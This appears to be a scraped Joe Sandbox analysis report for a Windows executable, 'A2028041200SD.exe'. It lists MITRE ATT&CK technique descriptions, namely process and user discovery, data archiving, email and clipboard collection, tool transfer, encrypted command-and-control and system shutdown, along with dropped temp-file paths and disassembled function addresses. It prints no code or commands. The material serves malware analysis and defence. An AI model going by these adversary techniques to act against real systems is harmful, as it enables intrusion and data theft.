Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report A2028041200SD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\-4EF4J77B

C:\Users\user\AppData\Local\Temp\autBD3.tmp

C:\Users\user\AppData\Local\Temp\bothsidedness

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
A2028041200SD.exe

Function 0100B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00FE3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 00FFDDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 00FE406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0102FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00FE3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0102BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00FE3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00FE3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 0100ACB3 Relevance: 15.2, APIs: 10, Instructions: 219
COMMON

Function 00A85FD0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00FE49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 00FE36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre